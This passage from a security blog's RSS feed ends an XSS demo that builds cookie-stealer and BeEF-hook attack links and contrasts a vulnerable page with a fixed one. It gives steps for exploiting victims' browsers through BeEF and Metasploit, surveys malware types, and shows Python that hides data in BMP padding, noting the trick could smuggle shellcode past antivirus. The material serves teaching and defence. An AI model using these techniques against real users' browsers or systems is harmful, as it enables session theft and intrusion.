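    """Crude check for this demo only: does the rendered page contain a live script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for name, payload in (("cookie stealer", COOKIE_STEALER), ("beef hook", BEEF_HOOK)):
        print(name, "link:", attack_url("http://victim.example/search", payload))
        print("  vulnerable page runs it:", executes_script(render_search_vulnerable(payload)))
        print("  fixed page runs it     :", executes_script(render_search_fixed(payload)))
```

Two practical caveats: encoding is context-specific, so a value placed inside a JavaScript block or a URL needs the encoding for that context rather than html.escape alone; and marking the session cookie HttpOnly stops document.cookie from reading it, but does nothing against the hook injection, which only needs the script to run.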
The browser module menu is used for exploitation, and what I like to do is use Metasploit browser modules to exploit the victim's browser. To do this, follow these steps.

1. Setting up Metasploit: BeEF uses XML-RPC (remote procedure call) to connect to Metasploit, so first you have to start the Metasploit XML-RPC daemon. Go to the Metasploit folder first, then run:

./msfconsole
msf &#62; load xmlrpc Pass=BeEFMSFPass

where BeEFMSFPass is the default password that BeEF uses to connect to Metasploit (you can change it in the beef/include/msf.inc.php file; you may also need to change the IP address in that include file).

2. Go to browser modules -&#62; metasploit browser exploit. You will see a page where you can choose any of the Metasploit exploits...]]></description>
									</item>
		<item>
		<title>What is a malware ?</title>
		<link>https://www.bluekaizen.org/what-is-a-malware/</link>
				<comments>https://www.bluekaizen.org/what-is-a-malware/#respond</comments>
				<pubDate>Wed, 24 Feb 2016 12:09:27 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3722</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/02/malware-analysis-category1-965x395-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/02/malware-analysis-category1-965x395-150x150.jpg 150w, https://www.bluekaizen.org/wp-content/uploads/2016/02/malware-analysis-category1-965x395-75x75.jpg 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>Malware is formally defined in Wikipedia as "software designed to secretly access a computer system without the owner's informed consent", and in Microsoft's TechNet as "any software designed to cause damage to a single computer, server, or computer network". The term itself is therefore generic for all types of malicious software that runs stealthily, without the user's intervention, and damages one or more legs of the CIA triad: for example, stealing the user's sensitive data (loss of confidentiality), modifying the contents of executable files (loss of integrity), or disabling services and crippling the OS (loss of availability).

Nevertheless, this definition should not be confused with employee monitoring and computer surveillance software, which can be deployed stealthily by the system administrators of a corporation to monitor and supervise all of their employees' computers. Although these programs bear some resemblance to the definition of malware, they are used to enforce enterprise policies on the employees. Such policies include monitoring and logging the applications employees run, reporting the installation of undesirable software if it somehow evaded the host policy, recording all documents and files opened by the users, or logging their web browsing activity. Commonly known examples are Nexthink, SpectorSoft and SurveilStar.

Malware is generally divided into broad categories, among which are:

a. Viruses
- Software designed to propagate through host files by attaching itself to other files. It can evade detection and destroy or damage systems automatically.
- Viruses are classified according to their detection-evasion techniques, which include, but are not limited to:
i. Stealth viruses, which manipulate the operating system into returning unmodified-looking data to virus scanners so that everything appears normal.
ii. Retroviruses, which attack the antivirus software itself, for example by damaging its virus signature database.
iii. Polymorphic viruses, which change their own content by encryption or modification in order to avoid signature detection.
iv. Armored viruses, which are coded to resist debugging and disassembly, slowing or hindering analysis of the virus internals.
v. Encrypted viruses, which rely on encryption to change their appearance every time they infect a system.
vi. Multipartite viruses, which infect more than one kind of target (typically both boot sectors and executable files), so that cleaning only one of them leaves the infection in place.
- Some of the famous viruses are CIH (1998) and Michelangelo (1991).

b. Worms
- Software designed to propagate without host files, consuming system and network resources automatically. Rather than attaching to other files, worms reside in memory and spread through network connections, e-mail or P2P programs, exploiting vulnerable applications to propagate.
- Some worms contain and deliver viruses to the infected systems.
- Some of the famous worms are Conficker (2008) and SQL Slammer (2003).
- In fact, the boundaries between internet worms and viruses are blurring, with malware such as the Melissa virus using the mass-mailing method of propagation.
- Because worms do not modify host files, they are generally easier to remove from infected systems than file-infecting viruses.

c. Trojan Horses
- Software designed to look like legitimate and useful software while carrying a malicious payload. It propagates via e-mail attachments or files downloaded by unaware users.
- Trojans resemble worms in their standalone structure, unlike viruses, and differ from both worms and viruses in depending on human intervention rather than automatic propagation.
- A classic remote-access trojan consists of two parts. The server part, once downloaded and executed by the unaware user, opens a specific port on the victim machine. The client part is used by the cracker to connect to the victim machine through that port and gives access to the infected system.
- Common examples are Back Orifice and SubSeven.

d. Spyware
- Software designed to monitor and steal the victim's private and personal information, such as credit card numbers and online game passwords. Spyware cannot self-replicate, so it needs human intervention to be installed on each victim. It usually propagates bundled with freeware from the internet, such as toolbars, or through malicious websites that exploit the web browser into downloading the spyware unintentionally.
- It can log keystrokes (a keylogger) to capture passwords, monitor and report web browsing activity, or redirect users to its own websites.
- Examples are Bonzi Buddy and Xupiter.

e. Adware
- A type of spyware that monitors the user's web browsing activity, sends it to remote servers, and serves unsolicited pop-up advertisements.
- Examples are Cydoor, Gator and Comet Cursor.

f. Scareware
- Also known as rogue security software: software designed to look like a legitimate and useful antivirus that can be purchased, but which carries a malicious payload and is completely useless as protection.
- Scareware relies on social engineering for propagation, falsely warning users that their workstations are infected and that the infection can be removed if they purchase the fake antivirus.
- An example is SpySheriff.

g. Logic Bombs
- Malware that resembles viruses in attaching itself to other executable files. When the file is executed, the logic bomb runs first and checks whether its trigger condition has been met. If not, control returns to the executable; if so, the logic bomb executes its malicious payload.
- A notable example is the Chernobyl (CIH) virus, whose payload attempts to overwrite the BIOS on 26 April of every year.

h. Rootkits
- Malware that provides root-level access to the victim operating system by modifying or replacing basic components of the operating system.
- Rootkits are known to be difficult to detect or remove with anti-malware scanners.
- One example is Tornkit (t0rn), a Linux rootkit.

i. Botnets
- A bot is a software agent that is mostly delivered with other malware, mainly viruses, worms, trojans and rootkits. When installed, it reports to a remote controller server and obeys its commands.
- Botnets are mostly used by the controlling cracker (the operator) as a network for rent: a customer purchases a number of compromised machines and gives the operator a spam message or a target IP, and the operator instructs the infected machines, mainly over IRC or web servers, to send the spam or to launch a massive Distributed Denial of Service attack against that IP.
- An example is Mariposa (built with the Butterfly bot kit).

j. Backdoors
- A backdoor is any deliberate configuration or piece of software that provides remote access to a system while bypassing the normal authentication procedures.
- A backdoor is not necessarily malware, since trojans and rootkits are not the only things that leave backdoors in a system: some legitimate programs do so to facilitate administration, recovery, or even anonymous information collection....]]></description>
						<wfw:commentRss>https://www.bluekaizen.org/what-is-a-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
							</item>
		<item>
		<title>Hiding data inside the padding area of files</title>
		<link>https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/</link>
				<comments>https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/#comments</comments>
				<pubDate>Wed, 24 Feb 2016 08:06:46 +0000</pubDate>
		<dc:creator><![CDATA[Security Kaizen]]></dc:creator>
				<category><![CDATA[Grey Hat]]></category>

		<guid isPermaLink="false">http://www.bluekaizen.org/?p=3708</guid>
				<description><![CDATA[<div><img width="150" height="150" src="https://www.bluekaizen.org/wp-content/uploads/2016/02/Screen-shot-2013-03-26-at-5.29.57-PM-150x150.png" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" style="margin-bottom: 15px;" srcset="https://www.bluekaizen.org/wp-content/uploads/2016/02/Screen-shot-2013-03-26-at-5.29.57-PM-150x150.png 150w, https://www.bluekaizen.org/wp-content/uploads/2016/02/Screen-shot-2013-03-26-at-5.29.57-PM-75x75.png 75w" sizes="(max-width: 150px) 100vw, 150px" /></div>Today we will talk about steganography, the science of hiding information inside other data instead of merely encrypting it. Steganography might be thought of as the cousin of cryptography, and the two can be combined into something stronger than either alone.

In most cases this is done by changing a small number of bytes in a carrier file, such as an image or a sound file, to the data we want to hide. To make this clear, check the example below. One of the following images contains the message "My secret message". Can you tell which of them contains it?

Actually, yes. By zooming into the second image, you will notice some coloured pixels at the bottom-left corner. Those pixels are the ones that carry the secret message.

The following picture shows the image opened in a hex editor (you may use Hex Workshop on Windows, or GHex or Bless on Linux):

What we are going to do here is hide the information inside what is called the padding area. Before that, let us first explain what the padding area is (you can skip this part if you are already familiar with it).

What is the padding area?

Some bytes are added to a file, or to a network packet, to bring its records up to a four-byte alignment. They are added because the computer handles data more efficiently when it is aligned to multiples of four bytes.
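
The BMP padding trick that this article goes on to walk through, carried out end to end as an added Python example (this is my code, not the article's): it writes a tiny 24-bit BMP with the standard 14-byte file header and 40-byte info header, hides a message in the row padding, reads it back, and checks that no pixel byte was changed. The 2x2 sample image, the message "test" and the helper names are constructed for the example; the padding_is_clean check is the detection counterpart a scanner could apply.

```python
import struct

BYTES_PER_PIXEL = 3  # 24-bit BMP: one byte each for blue, green, red


def row_padding(width, bytes_per_pixel=BYTES_PER_PIXEL):
    """Padding bytes after each pixel row so the next row starts on a 4-byte boundary.
    "% 4" alone gives the remainder; the padding is 4 minus that, mod 4."""
    return (4 - (width * bytes_per_pixel) % 4) % 4


def padding_capacity(width, height, bytes_per_pixel=BYTES_PER_PIXEL):
    """Total bytes that can be hidden in the padding of a width x height image."""
    return row_padding(width, bytes_per_pixel) * height


def build_bmp(rows):
    """Write a 24-bit BMP (14-byte file header + 40-byte info header + pixel array)
    from rows of (r, g, b) tuples, top row first. BMP stores rows bottom-up,
    pixels as B,G,R, and pads every row to a multiple of 4 bytes."""
    height, width = len(rows), len(rows[0])
    pad = row_padding(width)
    pixel_data = bytearray()
    for row in reversed(rows):
        for r, g, b in row:
            pixel_data += bytes((b, g, r))
        pixel_data += b"\x00" * pad  # a normal encoder writes zero padding
    headers_len = 14 + 40
    file_header = struct.pack("<2sIHHI", b"BM", headers_len + len(pixel_data), 0, 0, headers_len)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                              len(pixel_data), 2835, 2835, 0, 0)
    return bytes(file_header + info_header + pixel_data)


def _layout(bmp):
    """Pixel-array offset, width, height and per-row padding, read from the headers."""
    if bmp[:2] != b"BM":
        raise ValueError("not a BMP file")
    pixel_offset = struct.unpack_from("<I", bmp, 10)[0]
    width, height = struct.unpack_from("<ii", bmp, 18)
    if struct.unpack_from("<H", bmp, 28)[0] != 24:
        raise ValueError("this example handles 24-bit BMPs only")
    return pixel_offset, width, abs(height), row_padding(width)


def padding_offsets(bmp):
    """File offsets of every padding byte, row by row."""
    pixel_offset, width, height, pad = _layout(bmp)
    stride = width * BYTES_PER_PIXEL + pad
    for row in range(height):
        row_end = pixel_offset + row * stride + width * BYTES_PER_PIXEL
        for i in range(pad):
            yield row_end + i


def hide(bmp, message):
    """Overwrite the padding bytes with message; no pixel byte is touched."""
    slots = list(padding_offsets(bmp))
    if len(message) > len(slots):
        raise ValueError("message needs %d padding bytes, image has %d" % (len(message), len(slots)))
    out = bytearray(bmp)
    for offset, byte in zip(slots, message):
        out[offset] = byte
    return bytes(out)


def extract(bmp):
    """Read the padding bytes back; trailing zeros (untouched padding) are dropped,
    so a hidden message must not end in a zero byte."""
    return bytes(bmp[offset] for offset in padding_offsets(bmp)).rstrip(b"\x00")


def padding_is_clean(bmp):
    """Forensic check: a BMP written by a normal encoder has all-zero padding."""
    return all(bmp[offset] == 0 for offset in padding_offsets(bmp))


def pixels(bmp):
    """Decode the pixel array back to rows of (r, g, b), top row first
    (assumes the usual bottom-up row order, i.e. a positive height)."""
    pixel_offset, width, height, pad = _layout(bmp)
    stride = width * BYTES_PER_PIXEL + pad
    rows = []
    for row in range(height):
        base = pixel_offset + row * stride
        rows.append([tuple(reversed(bmp[base + x * 3:base + x * 3 + 3])) for x in range(width)])
    rows.reverse()
    return rows


# Constructed sample: a 2x2 image like the one in the BMP walk-through.
# Each row is 6 pixel bytes, so 2 padding bytes per row and 4 in total.
SAMPLE_ROWS = [[(255, 0, 0), (0, 255, 0)],
               [(0, 0, 255), (255, 255, 255)]]
COVER = build_bmp(SAMPLE_ROWS)
STEGO = hide(COVER, b"test")

if __name__ == "__main__":
    print("capacity:", padding_capacity(2, 2), "bytes")
    print("hidden  :", extract(STEGO), "pixels unchanged:", pixels(STEGO) == SAMPLE_ROWS)
    print("cover clean:", padding_is_clean(COVER), "stego clean:", padding_is_clean(STEGO))
```

Two things the walk-through below relies on are visible here: a width whose row length is already a multiple of four (for example 4 pixels at 24 bits) has no padding at all, so hide() refuses the message; and because every viewer skips the padding, the stego file renders identically while differing from the cover in exactly the padding bytes, which is also why a scanner that checks for non-zero padding can spot it.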
Aligned access is faster because the registers and the buses are 32 bits wide (assuming a 32-bit machine). One obvious example is your graphics card, which expects the frames sent to it to be aligned to four bytes.

Let us examine a simple BMP file and see the padding area. This example is taken from the BMP file specification on Wikipedia:

This table shows how the image is stored in the file. As seen above, the image of 4 pixels has four bytes of padding that no graphics application will ever render. Moreover, no application cares about their value, so the hidden message is stored in them.

Let us test it. In this 4-pixel image, the word "test" is stored in those 4 bytes; notice whether the colours change. One of the following two images contains the message and the other does not contain anything:

As seen above, the colours have not changed at all. In the following screenshot, the second picture, which contains the word "test", shows the changed bytes when opened in GHex:

How to calculate the available padding space?

Each pixel row of a BMP is padded to a multiple of 4 bytes, so the padding per row is (assuming a 32-bit alignment):

(4 - (number of pixels in a row * number of bytes per pixel) % 4) % 4

and the total available space is that value multiplied by the number of rows. Taking only the "% 4" remainder gives the number of bytes already used in the last word, not the number of padding bytes. Note that a row whose byte length is already a multiple of four has no padding at all, so such an image cannot carry anything this way.

Where can it be used?

It can be used for hiding information, but it can also be used to smuggle shellcode into websites that allow image uploads, and a worm could use the same trick to carry its shellcode inside an image instead of uploading the shellcode to a server. If it is used to store shellcode, will antivirus be able to detect that?

It is believed that antivirus will not be able to detect it, since the file's signature changes whenever the image or its dimensions change. A scanner that knows the BMP layout could, however, flag any file whose padding bytes are not all zero, since zero is what a normal encoder writes there.

About The Author

Fady Osman, Information Security Consultant at ZINAD]]></description>
						<wfw:commentRss>https://www.bluekaizen.org/hiding-data-inside-the-padding-area-of-files/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
							</item>
	</channel>
</rss>
